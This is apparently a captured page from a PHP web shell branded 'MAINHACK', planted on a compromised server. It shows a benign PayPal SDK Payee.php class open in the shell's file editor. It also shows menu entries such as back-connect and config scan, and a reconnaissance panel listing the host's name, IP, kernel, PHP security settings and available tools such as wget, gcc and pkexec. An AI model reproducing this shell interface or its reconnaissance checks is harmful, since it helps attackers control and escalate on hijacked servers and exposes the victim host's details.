[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Payee.php
<?php namespace PayPal\Api; use PayPal\Common\PayPalModel; /** * Class Payee * * A resource representing a Payee who receives the funds and fulfills the order. * * @package PayPal\Api * * @property string email * @property string merchant_id */ class Payee extends PayPalModel { /** * Email Address associated with the Payee's PayPal Account. If the provided email address is not associated with any PayPal Account, the payee can only receiver PayPal Wallet Payments. Direct Credit Card Payments will be denied due to card compliance requirements. * * @param string $email * * @return $this */ public function setEmail($email) { $this->email = $email; return $this; } /** * Email Address associated with the Payee's PayPal Account. If the provided email address is not associated with any PayPal Account, the payee can only receiver PayPal Wallet Payments. Direct Credit Card Payments will be denied due to card compliance requirements. * * @return string */ public function getEmail() { return $this->email; } /** * Encrypted PayPal account identifier for the Payee. * * @param string $merchant_id * * @return $this */ public function setMerchantId($merchant_id) { $this->merchant_id = $merchant_id; return $this; } /** * Encrypted PayPal account identifier for the Payee. * * @return string */ public function getMerchantId() { return $this->merchant_id; } /** * First Name of the Payee. * * @deprecated Not publicly available * @param string $first_name * * @return $this */ public function setFirstName($first_name) { $this->first_name = $first_name; return $this; } /** * First Name of the Payee. * * @deprecated Not publicly available * @return string */ public function getFirstName() { return $this->first_name; } /** * Last Name of the Payee. * * @deprecated Not publicly available * @param string $last_name * * @return $this */ public function setLastName($last_name) { $this->last_name = $last_name; return $this; } /** * Last Name of the Payee. * * @deprecated Not publicly available * @return string */ public function getLastName() { return $this->last_name; } /** * Unencrypted PayPal account Number of the Payee * * @deprecated Not publicly available * @param string $account_number * * @return $this */ public function setAccountNumber($account_number) { $this->account_number = $account_number; return $this; } /** * Unencrypted PayPal account Number of the Payee * * @deprecated Not publicly available * @return string */ public function getAccountNumber() { return $this->account_number; } /** * Information related to the Payer. In case of PayPal Wallet payment, this information will be filled in by PayPal after the user approves the payment using their PayPal Wallet. * * @deprecated Not publicly available * @param \PayPal\Api\Phone $phone * * @return $this */ public function setPhone($phone) { $this->phone = $phone; return $this; } /** * Information related to the Payer. In case of PayPal Wallet payment, this information will be filled in by PayPal after the user approves the payment using their PayPal Wallet. * * @deprecated Not publicly available * @return \PayPal\Api\Phone */ public function getPhone() { return $this->phone; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.61 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002